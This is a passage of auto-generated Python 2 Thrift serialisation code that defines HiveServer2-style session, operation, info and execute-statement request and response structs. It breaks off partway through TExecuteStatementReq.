def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TStatus(object):
"""
Attributes:
- statusCode
- infoMessages
- sqlState
- errorCode
- errorMessage
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'statusCode', None, None, ), # 1
(2, TType.LIST, 'infoMessages', (TType.STRING,None), None, ), # 2
(3, TType.STRING, 'sqlState', None, None, ), # 3
(4, TType.I32, 'errorCode', None, None, ), # 4
(5, TType.STRING, 'errorMessage', None, None, ), # 5
)
def __init__(self, statusCode=None, infoMessages=None, sqlState=None, errorCode=None, errorMessage=None,):
self.statusCode = statusCode
self.infoMessages = infoMessages
self.sqlState = sqlState
self.errorCode = errorCode
self.errorMessage = errorMessage
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.statusCode = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.infoMessages = []
(_etype105, _size102) = iprot.readListBegin()
for _i106 in xrange(_size102):
_elem107 = iprot.readString();
self.infoMessages.append(_elem107)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.sqlState = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I32:
self.errorCode = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.errorMessage = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TStatus')
if self.statusCode is not None:
oprot.writeFieldBegin('statusCode', TType.I32, 1)
oprot.writeI32(self.statusCode)
oprot.writeFieldEnd()
if self.infoMessages is not None:
oprot.writeFieldBegin('infoMessages', TType.LIST, 2)
oprot.writeListBegin(TType.STRING, len(self.infoMessages))
for iter108 in self.infoMessages:
oprot.writeString(iter108)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.sqlState is not None:
oprot.writeFieldBegin('sqlState', TType.STRING, 3)
oprot.writeString(self.sqlState)
oprot.writeFieldEnd()
if self.errorCode is not None:
oprot.writeFieldBegin('errorCode', TType.I32, 4)
oprot.writeI32(self.errorCode)
oprot.writeFieldEnd()
if self.errorMessage is not None:
oprot.writeFieldBegin('errorMessage', TType.STRING, 5)
oprot.writeString(self.errorMessage)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.statusCode is None:
raise TProtocol.TProtocolException(message='Required field statusCode is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class THandleIdentifier(object):
"""
Attributes:
- guid
- secret
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'guid', None, None, ), # 1
(2, TType.STRING, 'secret', None, None, ), # 2
)
def __init__(self, guid=None, secret=None,):
self.guid = guid
self.secret = secret
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.guid = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.secret = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('THandleIdentifier')
if self.guid is not None:
oprot.writeFieldBegin('guid', TType.STRING, 1)
oprot.writeString(self.guid)
oprot.writeFieldEnd()
if self.secret is not None:
oprot.writeFieldBegin('secret', TType.STRING, 2)
oprot.writeString(self.secret)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.guid is None:
raise TProtocol.TProtocolException(message='Required field guid is unset!')
if self.secret is None:
raise TProtocol.TProtocolException(message='Required field secret is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TSessionHandle(object):
"""
Attributes:
- sessionId
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'sessionId', (THandleIdentifier, THandleIdentifier.thrift_spec), None, ), # 1
)
def __init__(self, sessionId=None,):
self.sessionId = sessionId
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.sessionId = THandleIdentifier()
self.sessionId.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TSessionHandle')
if self.sessionId is not None:
oprot.writeFieldBegin('sessionId', TType.STRUCT, 1)
self.sessionId.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.sessionId is None:
raise TProtocol.TProtocolException(message='Required field sessionId is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TOperationHandle(object):
"""
Attributes:
- operationId
- operationType
- hasResultSet
- modifiedRowCount
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'operationId', (THandleIdentifier, THandleIdentifier.thrift_spec), None, ), # 1
(2, TType.I32, 'operationType', None, None, ), # 2
(3, TType.BOOL, 'hasResultSet', None, None, ), # 3
(4, TType.DOUBLE, 'modifiedRowCount', None, None, ), # 4
)
def __init__(self, operationId=None, operationType=None, hasResultSet=None, modifiedRowCount=None,):
self.operationId = operationId
self.operationType = operationType
self.hasResultSet = hasResultSet
self.modifiedRowCount = modifiedRowCount
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.operationId = THandleIdentifier()
self.operationId.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.operationType = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.BOOL:
self.hasResultSet = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.DOUBLE:
self.modifiedRowCount = iprot.readDouble();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TOperationHandle')
if self.operationId is not None:
oprot.writeFieldBegin('operationId', TType.STRUCT, 1)
self.operationId.write(oprot)
oprot.writeFieldEnd()
if self.operationType is not None:
oprot.writeFieldBegin('operationType', TType.I32, 2)
oprot.writeI32(self.operationType)
oprot.writeFieldEnd()
if self.hasResultSet is not None:
oprot.writeFieldBegin('hasResultSet', TType.BOOL, 3)
oprot.writeBool(self.hasResultSet)
oprot.writeFieldEnd()
if self.modifiedRowCount is not None:
oprot.writeFieldBegin('modifiedRowCount', TType.DOUBLE, 4)
oprot.writeDouble(self.modifiedRowCount)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.operationId is None:
raise TProtocol.TProtocolException(message='Required field operationId is unset!')
if self.operationType is None:
raise TProtocol.TProtocolException(message='Required field operationType is unset!')
if self.hasResultSet is None:
raise TProtocol.TProtocolException(message='Required field hasResultSet is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TOpenSessionReq(object):
"""
Attributes:
- client_protocol
- username
- password
- configuration
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'client_protocol', None, 1, ), # 1
(2, TType.STRING, 'username', None, None, ), # 2
(3, TType.STRING, 'password', None, None, ), # 3
(4, TType.MAP, 'configuration', (TType.STRING,None,TType.STRING,None), None, ), # 4
)
def __init__(self, client_protocol=thrift_spec[1][4], username=None, password=None, configuration=None,):
self.client_protocol = client_protocol
self.username = username
self.password = password
self.configuration = configuration
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.client_protocol = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.username = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.password = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.MAP:
self.configuration = {}
(_ktype110, _vtype111, _size109 ) = iprot.readMapBegin()
for _i113 in xrange(_size109):
_key114 = iprot.readString();
_val115 = iprot.readString();
self.configuration[_key114] = _val115
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TOpenSessionReq')
if self.client_protocol is not None:
oprot.writeFieldBegin('client_protocol', TType.I32, 1)
oprot.writeI32(self.client_protocol)
oprot.writeFieldEnd()
if self.username is not None:
oprot.writeFieldBegin('username', TType.STRING, 2)
oprot.writeString(self.username)
oprot.writeFieldEnd()
if self.password is not None:
oprot.writeFieldBegin('password', TType.STRING, 3)
oprot.writeString(self.password)
oprot.writeFieldEnd()
if self.configuration is not None:
oprot.writeFieldBegin('configuration', TType.MAP, 4)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.configuration))
for kiter116,viter117 in self.configuration.items():
oprot.writeString(kiter116)
oprot.writeString(viter117)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.client_protocol is None:
raise TProtocol.TProtocolException(message='Required field client_protocol is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TOpenSessionResp(object):
"""
Attributes:
- status
- serverProtocolVersion
- sessionHandle
- configuration
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
(2, TType.I32, 'serverProtocolVersion', None, 1, ), # 2
(3, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 3
(4, TType.MAP, 'configuration', (TType.STRING,None,TType.STRING,None), None, ), # 4
)
def __init__(self, status=None, serverProtocolVersion=thrift_spec[2][4], sessionHandle=None, configuration=None,):
self.status = status
self.serverProtocolVersion = serverProtocolVersion
self.sessionHandle = sessionHandle
self.configuration = configuration
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.status = TStatus()
self.status.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.serverProtocolVersion = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.sessionHandle = TSessionHandle()
self.sessionHandle.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.MAP:
self.configuration = {}
(_ktype119, _vtype120, _size118 ) = iprot.readMapBegin()
for _i122 in xrange(_size118):
_key123 = iprot.readString();
_val124 = iprot.readString();
self.configuration[_key123] = _val124
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TOpenSessionResp')
if self.status is not None:
oprot.writeFieldBegin('status', TType.STRUCT, 1)
self.status.write(oprot)
oprot.writeFieldEnd()
if self.serverProtocolVersion is not None:
oprot.writeFieldBegin('serverProtocolVersion', TType.I32, 2)
oprot.writeI32(self.serverProtocolVersion)
oprot.writeFieldEnd()
if self.sessionHandle is not None:
oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 3)
self.sessionHandle.write(oprot)
oprot.writeFieldEnd()
if self.configuration is not None:
oprot.writeFieldBegin('configuration', TType.MAP, 4)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.configuration))
for kiter125,viter126 in self.configuration.items():
oprot.writeString(kiter125)
oprot.writeString(viter126)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.status is None:
raise TProtocol.TProtocolException(message='Required field status is unset!')
if self.serverProtocolVersion is None:
raise TProtocol.TProtocolException(message='Required field serverProtocolVersion is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TCloseSessionReq(object):
"""
Attributes:
- sessionHandle
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
)
def __init__(self, sessionHandle=None,):
self.sessionHandle = sessionHandle
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.sessionHandle = TSessionHandle()
self.sessionHandle.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TCloseSessionReq')
if self.sessionHandle is not None:
oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
self.sessionHandle.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.sessionHandle is None:
raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TCloseSessionResp(object):
"""
Attributes:
- status
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
)
def __init__(self, status=None,):
self.status = status
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.status = TStatus()
self.status.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TCloseSessionResp')
if self.status is not None:
oprot.writeFieldBegin('status', TType.STRUCT, 1)
self.status.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.status is None:
raise TProtocol.TProtocolException(message='Required field status is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetInfoValue(object):
"""
Attributes:
- stringValue
- smallIntValue
- integerBitmask
- integerFlag
- binaryValue
- lenValue
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'stringValue', None, None, ), # 1
(2, TType.I16, 'smallIntValue', None, None, ), # 2
(3, TType.I32, 'integerBitmask', None, None, ), # 3
(4, TType.I32, 'integerFlag', None, None, ), # 4
(5, TType.I32, 'binaryValue', None, None, ), # 5
(6, TType.I64, 'lenValue', None, None, ), # 6
)
def __init__(self, stringValue=None, smallIntValue=None, integerBitmask=None, integerFlag=None, binaryValue=None, lenValue=None,):
self.stringValue = stringValue
self.smallIntValue = smallIntValue
self.integerBitmask = integerBitmask
self.integerFlag = integerFlag
self.binaryValue = binaryValue
self.lenValue = lenValue
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.stringValue = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I16:
self.smallIntValue = iprot.readI16();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I32:
self.integerBitmask = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I32:
self.integerFlag = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.binaryValue = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I64:
self.lenValue = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetInfoValue')
if self.stringValue is not None:
oprot.writeFieldBegin('stringValue', TType.STRING, 1)
oprot.writeString(self.stringValue)
oprot.writeFieldEnd()
if self.smallIntValue is not None:
oprot.writeFieldBegin('smallIntValue', TType.I16, 2)
oprot.writeI16(self.smallIntValue)
oprot.writeFieldEnd()
if self.integerBitmask is not None:
oprot.writeFieldBegin('integerBitmask', TType.I32, 3)
oprot.writeI32(self.integerBitmask)
oprot.writeFieldEnd()
if self.integerFlag is not None:
oprot.writeFieldBegin('integerFlag', TType.I32, 4)
oprot.writeI32(self.integerFlag)
oprot.writeFieldEnd()
if self.binaryValue is not None:
oprot.writeFieldBegin('binaryValue', TType.I32, 5)
oprot.writeI32(self.binaryValue)
oprot.writeFieldEnd()
if self.lenValue is not None:
oprot.writeFieldBegin('lenValue', TType.I64, 6)
oprot.writeI64(self.lenValue)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetInfoReq(object):
"""
Attributes:
- sessionHandle
- infoType
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
(2, TType.I32, 'infoType', None, None, ), # 2
)
def __init__(self, sessionHandle=None, infoType=None,):
self.sessionHandle = sessionHandle
self.infoType = infoType
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.sessionHandle = TSessionHandle()
self.sessionHandle.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.infoType = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetInfoReq')
if self.sessionHandle is not None:
oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
self.sessionHandle.write(oprot)
oprot.writeFieldEnd()
if self.infoType is not None:
oprot.writeFieldBegin('infoType', TType.I32, 2)
oprot.writeI32(self.infoType)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.sessionHandle is None:
raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
if self.infoType is None:
raise TProtocol.TProtocolException(message='Required field infoType is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TGetInfoResp(object):
"""
Attributes:
- status
- infoValue
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'infoValue', (TGetInfoValue, TGetInfoValue.thrift_spec), None, ), # 2
)
def __init__(self, status=None, infoValue=None,):
self.status = status
self.infoValue = infoValue
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.status = TStatus()
self.status.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.infoValue = TGetInfoValue()
self.infoValue.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TGetInfoResp')
if self.status is not None:
oprot.writeFieldBegin('status', TType.STRUCT, 1)
self.status.write(oprot)
oprot.writeFieldEnd()
if self.infoValue is not None:
oprot.writeFieldBegin('infoValue', TType.STRUCT, 2)
self.infoValue.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.status is None:
raise TProtocol.TProtocolException(message='Required field status is unset!')
if self.infoValue is None:
raise TProtocol.TProtocolException(message='Required field infoValue is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TExecuteStatementReq(object):
"""
Attributes:
- sessionHandle
- statement
- confOverlay
- runAsync
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
(2, TType.STRING, 'statement', None, None, ), # 2
(3, TType.MAP, 'confOverlay', (TType.STRING,None,TType.STRING,None), None, ), # 3
(4, TType.BOOL, 'runAsync', None, False, ), # 4
)
def __init__(self, sessionHandle=None, statement=None, confOverlay=None, runAsync=thrift_spec[4][4],):
self.sessionHandle = sessionHandle
self.statement = statement
self.confOverlay = confOverlay
self.runAsync = runAsync
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.sessionHandle = TSessionHandle()
self.sessionHandle.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.statement = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.MAP:
self.confOverlay = {}
(_ktype128, _vtype129, _size127 ) = iprot.readMapBegin()
for _i131 in xrange(_size127):
_key132 = iprot.readString();
_val133 = iprot.readString();
self.confOverlay[_key132] = _val133
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.BOOL:
self.runAsync = iprot.readBool();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TExecuteStatementReq')
if self.sessionHandle is not None:
oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
self.sessionHandle.write(oprot)
oprot.writeFieldEnd()
if self.statement is not None:
oprot.writeFieldBegin('statement', TType.STRING, 2)
oprot.writeString(self.statement)
oprot.writeFieldEnd()
if self.confOverlay is not None:
oprot.writeFieldBegin('confOverlay', TType.MAP, 3)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.confOverlay))
for kiter134,viter135 in self.confOverlay.items():
oprot.writeString(kiter134)
oprot.writeString(viter135)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.runAsync is not None:
